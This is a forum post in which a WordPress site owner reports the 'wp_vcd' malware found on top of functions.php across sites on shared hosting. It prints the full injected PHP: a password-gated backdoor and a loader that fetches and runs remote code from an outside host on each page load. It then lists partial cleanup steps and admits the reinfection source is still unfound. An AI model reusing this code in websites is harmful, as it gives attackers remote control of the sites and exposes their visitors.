PHP code in functions.php of all wordpress websites on my shared hosting

admin

Administrator
Staff member
I have a shared hosting and some wordpress websites on that.
Recently sometimes when I visit my websites, popup opens.
So I opened template directory of one wordpress website in Cpanel. this code was added on top of
Code:
functions.php
file:

Code:
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))
    {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action'])
        {
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
        {
        if (!empty($_REQUEST['newdomain']))
            {
            if ($file = @file_get_contents(__FILE__))
                {
                if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain))
                    {
                    $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                    }
                }
            }
        }

    break;

default:
    print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

die("");
}

if (!function_exists('theme_temp_setup'))
    {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (!is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false)
        {
        if ($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=" . $path))
            {
            function theme_temp_setup($phpCode)
                {
                $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;

                unlink($tmpfname);
                return get_defined_vars();
                }

            extract(theme_temp_setup($tmpcontent));
            }
        }
    }

?>

So I deteled that and popup problem solved. I deleted that from
Code:
functions.php
files of all websites But
Now problem is that when I visit
Code:
functions.php
of any websites, the code is there again and its in all themes even unused themes.
What can I do?

<hr>

<strong>What I did to slove problem</strong>

<ol>
<li>In
Code:
wp-include
directory, delete
Code:
wp-vcd.php
and
Code:
class.wp.php
files</li>
<li>In
Code:
wp-include
directory, open
Code:
post.php
and detele first php tag
added by Malware.</li>
<li>Open to theme's
Code:
functions.php
file, and delete the above codes.</li>
</ol>

This should stop popups. But I don't now how long it works.

<hr>

I still didn't find the main file that infect all websites, but tying to find out.